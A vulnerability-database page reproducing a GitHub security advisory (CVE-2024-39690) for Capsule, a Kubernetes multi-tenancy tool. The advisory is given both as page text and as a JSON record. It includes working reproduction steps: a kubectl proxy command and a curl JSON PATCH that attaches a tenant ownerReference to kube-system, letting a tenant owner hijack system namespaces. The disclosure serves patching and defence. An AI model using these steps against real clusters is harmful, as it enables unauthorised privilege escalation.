ghsa-mq69-4j5w-3qwp
Vulnerability from github
Published
2024-08-20 18:34
Modified
2025-08-14 13:32
Severity ?
8.4 (High) - CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
8.6 (High) - CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Summary
Capsule tenant owner with "patch namespace" permission can hijack system namespaces
Details

Attack Vector

Then, let me briefly explain the reasons for the errors mentioned above: 1. The 'kubectl edit' command was used to patch the namespace, but this operation requires both 'get' and 'patch' permissions, hence the error. One should use methods like 'curl' to directly send a PATCH request; 2. The webhook does not intercept patch operations on 'kube-system' because 'kube-system' does not have an ownerReference.

Below are my detailed reproduction steps

  1. Create a test cluster kind create cluster --image=kindest/node:v1.24.15 --name=k8s
  2. Install the capsule helm install capsule projectcapsule/capsule -n capsule-system --create-namespace
  3. Create a tenant ``` kubectl create -f - << EOF apiVersion: capsule.clastix.io/v1beta2 kind: Tenant metadata: name: tenant1 spec: owners:
  4. name: alice kind: User EOF ```
  5. Create user alice ./create-user.sh alice tenant1 capsule.clastix.io export KUBECONFIG=alice-tenant1.kubeconfig
  6. Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.) ``` kubectl proxy

export DATA='[{"op": "add", "path": "/metadata/ownerReferences", "value":[{"apiVersion": "capsule.clastix.io/v1beta2", "blockOwnerDeletion": true, "controller": true, "kind": "Tenant", "name": "tenant1", "uid": "ce3f2296-4aaa-45b0-a8fe-879d5096f193"}]}]'

curl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATCH -d "$DATA" -H "Content-Type: application/json-patch+json" ``` 7. Check the result The kube-system is patched successfully. image

Summary

The tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.

I would like to express my apologies once again. I have always been sincere in my research and communication, and I did not intend to disturb you on purpose.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.7.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/projectcapsule/capsule"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-39690"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-20T18:34:37Z",
    "nvd_published_at": "2024-08-20T15:15:21Z",
    "severity": "HIGH"
  },
  "details": "# Attack Vector\nThen, let me briefly explain the reasons for the errors mentioned above: 1. The \u0027kubectl edit\u0027 command was used to patch the namespace, but this operation requires both \u0027get\u0027 and \u0027patch\u0027 permissions, hence the error. One should use methods like \u0027curl\u0027 to directly send a PATCH request; 2. The webhook does not intercept patch operations on \u0027kube-system\u0027 because \u0027kube-system\u0027 does not have an ownerReference.\n\n# Below are my detailed reproduction steps\n1. Create a test cluster\n`kind create cluster --image=kindest/node:v1.24.15 --name=k8s`\n2. Install the capsule\n`helm install capsule projectcapsule/capsule -n capsule-system --create-namespace`\n3. Create a tenant\n```\nkubectl create -f - \u003c\u003c EOF\napiVersion: capsule.clastix.io/v1beta2\nkind: Tenant\nmetadata:\n  name: tenant1\nspec:\n  owners:\n  - name: alice\n    kind: User\nEOF\n```\n4. Create user alice\n```\n./create-user.sh alice tenant1 capsule.clastix.io\nexport KUBECONFIG=alice-tenant1.kubeconfig\n```\n5. Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)\n```\nkubectl proxy\n\nexport DATA=\u0027[{\"op\": \"add\", \"path\": \"/metadata/ownerReferences\", \"value\":[{\"apiVersion\": \"capsule.clastix.io/v1beta2\", \"blockOwnerDeletion\": true, \"controller\": true, \"kind\": \"Tenant\", \"name\": \"tenant1\", \"uid\": \"ce3f2296-4aaa-45b0-a8fe-879d5096f193\"}]}]\u0027\n\ncurl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATCH -d \"$DATA\" -H \"Content-Type: application/json-patch+json\"\n```\n7. Check the result\nThe kube-system is patched successfully.\n![image](https://github.com/projectcapsule/capsule/assets/151004196/e2775304-c1f4-494d-ab15-14f6f33e29ec)\n\n\n# Summary\nThe tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.\n\nI would like to express my apologies once again. I have always been sincere in my research and communication, and I did not intend to disturb you on purpose.",
  "id": "GHSA-mq69-4j5w-3qwp",
  "modified": "2025-08-14T13:32:09Z",
  "published": "2024-08-20T18:34:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39690"
    },
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/projectcapsule/capsule"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Capsule tenant owner with \"patch namespace\" permission can hijack system namespaces"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.